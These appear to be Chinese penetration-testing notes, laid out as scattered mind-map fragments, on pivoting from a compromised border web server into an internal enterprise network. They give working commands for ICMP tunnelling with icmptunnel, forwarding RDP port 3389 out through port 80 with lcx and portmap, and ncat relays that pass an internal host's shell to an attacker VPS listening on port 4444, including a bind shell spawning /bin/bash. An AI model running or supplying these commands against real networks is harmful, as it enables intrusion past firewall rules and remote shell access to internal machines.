ptunnel

./icmptunnel -s /sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0

限制

本地转发到VPS：lcx.exe -tran 3389 VPS_ip  80

边界web服务器

边界主机的3389端口不出网，但是80端口出网

ncat --sh-exec \"ncat 内网主机ip 3389\" -l 9999  --keep-open

webshell

跳板机

内网主机，仅仅可与边界主机通信

portmap内网代理工具，通过webshell，以跳板机可以访问内网，将内网主机端口转发到边界服务器的指定端口。我们访问边界服务器的指定端口，即可访问内网服务器对应端口服务

hacker

./portmap -m 1 -p1 边界服务器端口 -h2 内网ip -p2 内网端口

ncat -v VPS_ip 4444 -c \"nc -v 内网主机ip 1111\"

80端口

本地转发到本地lcx.exe -tran 80 127.0.0.1 3389

portmap实现本地端口转发，远程主机转发

ncat是netcat的升级版，实现内网代理，拿到通过tcp传数据的shell。vps主机监听本地端口，内网主机监听端口执行shell。跳板机连接内网监听的端口，将执行结果给vps监听的端口

./icmptunnel VPS(kali)ip/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0

VPS（kali）攻击机

边界服务器

ncat -lvp 4444

nc也可以实现端口转发，将执行内网端口的结果发给跳板机的出网端口

企业内网环境

icmptunnel隧道代理工具，通过VPS作为服务器端。将跳板机的流量转发给vps

ncat -lvp 1111 -e /bin/bash